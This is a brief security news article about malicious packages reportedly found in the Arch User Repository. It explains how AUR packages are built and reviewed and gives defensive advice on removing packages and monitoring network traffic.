Malicious apps slipped into the Arch User Repository — how to protect yourself

Researchers at Sonatype found about 1,500 malicious packages in the Arch User Repository. The Arch team urged users to review all PKGBUILD and install script changes when updating and to report suspicious commits via the aur-general mailing list. The AUR lets developers make software available before it reaches Arch’s official repositories: package descriptions (PKGBUILDs) make it possible to compile source with makepkg and install with pacman.

Anyone can upload packages and Trusted Users are meant to monitor submissions, but obfuscated malicious code can evade quick reviews and be added to the repository. If you installed anything from the AUR, remove it now: sudo pacman -R PACKAGENAME and then verify installed packages with pacman -Q.

Stop using the AUR until maintainers put stronger protections in place, and scan for suspicious outgoing traffic with a tool like Wireshark; block unknown connections or reinstall the OS if you find signs of compromise.

aur, arch linux, malicious packages, pkgbuild, pacman, makepkg, sonatype, trusted users, wireshark, aur-general